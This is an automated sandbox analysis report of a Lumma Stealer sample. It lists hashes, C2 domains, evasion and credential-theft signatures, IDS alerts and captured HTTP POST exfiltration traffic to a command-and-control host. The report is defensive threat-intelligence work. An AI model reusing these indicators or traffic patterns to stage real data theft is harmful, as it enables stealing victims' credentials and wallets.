Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LNn56KMkEE.exe

Overview

General Information

Sample name:LNn56KMkEE.exe
renamed because original name is a hash value
Original sample name:5f8d5c992633d84420477157cb75f8ae.exe
Analysis ID:1579784
MD5:5f8d5c992633d84420477157cb75f8ae
SHA1:96e3391bb7d724dc2473e9683d5c4d8b127838b8
SHA256:417c9ef01a8077d082b1b053311d219902988c959cc91ccffa262bff29fe8cbb
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • LNn56KMkEE.exe (PID: 6948 cmdline: "C:\Users\user\Desktop\LNn56KMkEE.exe" MD5: 5F8D5C992633D84420477157CB75F8AE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rapeflowwj.lat", "aspecteirs.lat", "energyaffai.lat", "sweepyribs.lat", "discokeyus.lat", "grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat"], "Build id": "PsFKDg--pablo"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 10 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:39.564438+010020283713Unknown Traffic192.168.2.449730104.102.49.254443TCP
                2024-12-23T09:06:41.908306+010020283713Unknown Traffic192.168.2.449731104.21.66.86443TCP
                2024-12-23T09:06:44.206100+010020283713Unknown Traffic192.168.2.449732104.21.66.86443TCP
                2024-12-23T09:06:46.561842+010020283713Unknown Traffic192.168.2.449733104.21.66.86443TCP
                2024-12-23T09:06:48.814360+010020283713Unknown Traffic192.168.2.449734104.21.66.86443TCP
                2024-12-23T09:06:50.909006+010020283713Unknown Traffic192.168.2.449735104.21.66.86443TCP
                2024-12-23T09:06:53.676746+010020283713Unknown Traffic192.168.2.449737104.21.66.86443TCP
                2024-12-23T09:06:56.370335+010020283713Unknown Traffic192.168.2.449739104.21.66.86443TCP
                2024-12-23T09:07:00.486545+010020283713Unknown Traffic192.168.2.449744104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:42.631868+010020546531A Network Trojan was detected192.168.2.449731104.21.66.86443TCP
                2024-12-23T09:06:44.975014+010020546531A Network Trojan was detected192.168.2.449732104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:42.631868+010020498361A Network Trojan was detected192.168.2.449731104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:44.975014+010020498121A Network Trojan was detected192.168.2.449732104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:37.263224+010020583541Domain Observed Used for C2 Detected192.168.2.4547791.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:37.668445+010020583581Domain Observed Used for C2 Detected192.168.2.4528461.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:36.812543+010020583601Domain Observed Used for C2 Detected192.168.2.4626591.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:37.105933+010020583621Domain Observed Used for C2 Detected192.168.2.4502141.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:36.672146+010020583641Domain Observed Used for C2 Detected192.168.2.4603941.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:36.955604+010020583701Domain Observed Used for C2 Detected192.168.2.4563901.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:37.810524+010020583741Domain Observed Used for C2 Detected192.168.2.4574911.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:37.470705+010020583761Domain Observed Used for C2 Detected192.168.2.4628691.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:36.516878+010020583781Domain Observed Used for C2 Detected192.168.2.4539141.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:49.473733+010020480941Malware Command and Control Activity Detected192.168.2.449734104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:06:40.318447+010028586661Domain Observed Used for C2 Detected192.168.2.449730104.102.49.254443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: LNn56KMkEE.exeAvira: detected
                Source: LNn56KMkEE.exe.6948.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "aspecteirs.lat", "energyaffai.lat", "sweepyribs.lat", "discokeyus.lat", "grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "sustainskelet.lat"], "Build id": "PsFKDg--pablo"}
                Source: LNn56KMkEE.exeVirustotal: Detection: 67%Perma Link
                Source: LNn56KMkEE.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: LNn56KMkEE.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1928086988.00000000004A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
                Source: LNn56KMkEE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:53914 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.4:57491 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.4:50214 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.4:62869 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:60394 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.4:56390 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:62659 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.4:54779 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.4:52846 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.66.86:443
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IN3K5IA4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18103Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V2KVRS1ZQKT53LIWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8772Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4LYW44T8B2HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20395Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C07PW8AQYBH82RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1233Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=83ZR4JYWYD19B9ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568739Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.co: equals www.youtube.com (Youtube)
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; objectQ equals www.youtube.com (Youtube)
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NT AUTHORITY\SYSTEMWdtPWdtPWdtPteambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ed.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: LNn56KMkEE.exeString found in binary or memory: m/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ances equals www.youtube.com (Youtube)
                Source: LNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: teambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: LNn56KMkEE.exe, 00000000.00000003.1752668180.0000000001006000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774699395.000000000106A000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: LNn56KMkEE.exe, 00000000.00000003.1818318321.00000000058CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
